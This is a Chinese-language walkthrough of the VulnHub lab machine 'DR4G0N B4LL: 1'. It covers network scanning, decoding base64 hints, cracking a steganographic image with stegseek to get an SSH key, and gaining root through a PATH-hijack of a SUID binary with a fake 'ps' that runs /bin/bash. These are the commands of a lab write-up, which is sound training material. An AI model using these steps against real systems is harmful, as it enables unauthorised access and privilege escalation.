DR4G0N B4LL: 1

admin 2024年11月14日23:52:12评论7 views字数 975阅读3分15秒阅读模式

下载地址:

http://www.vulnhub.com/entry/dr4g0n-b4ll-1,646/

虚拟机:VMware16

确定目标

确认目标IP地址

netdiscover -r 192.168.234.0/24

DR4G0N B4LL: 1

服务端口

nmap -v -T4 -A -p- -oN nmap.log 192.168.234.129

DR4G0N B4LL: 1

访问网页

DR4G0N B4LL: 1

网页打开无法加载css可能需要绑定域名然后在源代码里面发现了odin的域名绑定在hosts里面就好了

枚举网页服务器

192.168.234.129

DR4G0N B4LL: 1

检查网页源码

DR4G0N B4LL: 1

base64解码

DR4G0N B4LL: 1

查看robots.txt

DR4G0N B4LL: 1

使用base64解码

DR4G0N B4LL: 1

检查隐藏目录

DR4G0N B4LL: 1

将vulnhub里的jpg发送到本地机器

DR4G0N B4LL: 1

暴力破解密码

stegseek aj.jpg /home/kali/rockyou.txt

DR4G0N B4LL: 1在aj.jpg.out中获得ssh密钥,要登录ssh先更改权限

DR4G0N B4LL: 1

在/login.html路径下找到用户名

DR4G0N B4LL: 1

登录ssh

ssh [email protected] -i id_rsa

DR4G0N B4LL: 1

权限提升

在home目录中找到user flag

ls -al

cat local.txt

DR4G0N B4LL: 1

进一步提升权限,寻找SUID二进制文件,找到shell的二进制文件

find / -perm -4000 -type f -exec ls -al {} ; 2>/dev/null

DR4G0N B4LL: 1

检查二进制文件的作用,它是二进制ps的副本,不能使用ps来提升权限,但是在同目录中有一个demo.c的源文件

cd script/

ls -al

./shell

DR4G0N B4LL: 1

在这里,我们可以观察到程序没有使用二进制文件的绝对路径。在这种情况下,它会查看环境变量PATH,而且,这会导致我们通过将具有相同名称的自定义二进制文件导出到路径来提升权限

DR4G0N B4LL: 1

创建了一个文件 ps,其内容为“/bin/bash”。然后,我使其可执行并将目录导出到 PATH。现在,如果我们在终端中使用单词“ps”检查调用的是什么,我们会得到这个自定义二进制文件

cd /tmp

echo "/bin/bash" > ps

chmod +x ps

export PATH=/tmp:$PATH

which ps

DR4G0N B4LL: 1

运行命令来获取 shell

~/script/shell

DR4G0N B4LL: 1

找到root flag

cd /root

ls -al

cat proof.txt

DR4G0N B4LL: 1

DR4G0N B4LL: 1

本文版权归作者和微信公众号平台共有,重在学习交流,不以任何盈利为目的,欢迎转载。

 

原文始发于微信公众号(无问之路):DR4G0N B4LL: 1

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年11月14日23:52:12
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   DR4G0N B4LL: 1http://cn-sec.com/archives/1639771.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息